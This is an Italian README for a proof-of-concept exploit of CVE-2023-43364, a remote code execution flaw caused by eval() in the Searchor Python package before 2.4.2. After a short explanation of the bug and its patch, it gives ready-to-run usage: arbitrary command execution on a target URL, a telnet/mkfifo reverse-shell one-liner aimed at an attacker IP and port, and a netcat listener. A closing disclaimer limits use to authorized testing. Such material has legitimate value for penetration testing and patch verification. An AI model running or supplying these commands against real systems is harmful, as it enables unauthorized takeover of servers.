
POC di exploit tramite uso non sicuro di `eval()` in Searchor (< 2.4.2)
Esecuzione remota di codice (RCE) tramite uso non sicuro di
eval()in Searchor (< 2.4.2)
Questo progetto dimostra lo sfruttamento di CVE-2023-43364, una vulnerabilità di esecuzione remota di codice (RCE) che colpisce il pacchetto Python Searchor (< 2.4.2).
Il problema è causato dall'uso non sicuro di eval() su input controllati dall'utente, consentendo agli aggressori di iniettare ed eseguire codice Python arbitrario.
La vulnerabilità è stata corretta rimuovendo l'uso insicuro di eval(), come mostrato nella patch ufficiale:
Ulteriori dettagli tecnici e avviso:
Questa prova di concetto fornisce molteplici metodi di esecuzione, tra cui esecuzione di comandi, validazione del test e reverse shell.
Esegui un semplice comando (id) per verificare l'esecuzione del codice:
python3 CVE-2023-43364.py <URL> --test
Esegui comando personalizzato Esegui qualsiasi comando sul server di destinazione:
python3 CVE-2023-43364.py <URL> -a "whoami"
Esempi:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Shell inversa Avvia un listener sulla tua macchina:
nc -lvnp 4444
Esegui l'exploit:
python3 CVE-2023-43364.py <URL> <LHOST>
Questo progetto è destinato a:
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Usa questo exploit solo in ambienti controllati o su sistemi per i quali hai esplicita autorizzazione al test.